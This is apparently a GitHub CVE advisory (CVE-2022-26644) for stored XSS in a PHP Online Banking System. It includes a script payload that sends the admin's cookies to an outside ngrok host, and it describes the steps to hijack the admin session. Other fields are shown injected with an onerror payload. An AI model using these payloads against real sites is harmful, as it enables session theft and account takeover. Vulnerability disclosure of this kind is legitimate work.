Skip to content
main
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
CVE/CVE-2022-26644/
CVE/CVE-2022-26644/

Latest commit

 

Git stats

Files

Permalink
Failed to load latest commit information.
Type
Name
Latest commit message
Commit time
 
 

Tittle: Online Banking System Stored XSS

Author: (Erik451)

CVE: CVE-2022-26644

Vendor Homepage: https://www.sourcecodester.com/

Software Link: Online Banking System

Version: OBS 1.0

Description: A XSS issue in OBS v1.0 allows remote attackers to inject JavaScript in the description parameters. XSS to Privilege Escalation

  • Client can craft a malicious payload, when the administrator goes to "account managment menu" the payload will be executed and the administrator cookies will be sent to the attacker server.

Steps to reproduce:

Client Session

Payload used to steal the session Cookie:

<script>var i=new Image;i.src=`https://2c32-81-9-194-204.ngrok.io/?c=${document.cookie}`;</script>

ngrokclient

Admin Session

The administrator goes to the manage accounts menu and will execute the payload in background. Now we have the admin cookie on the request

admincookie

Client Session

Edit our cookie with the new admin cookie, reload admin page and now we are administrators.

loginasadmin


Other XSS

Payload used: <img src="x" onerror=prompt(1)>

Announcements Tittle

XSSannouncement

XSSannouncement2

Accounts Name

System Info Name

  • 1- Go to http://web.com/admin/?page=system_info
  • 2- Edite the app/system info and paste the payload
  • 3- This is the configuration of the app, all clients will see the tittle on the app, the XSS will be executed.

XSSsysinfo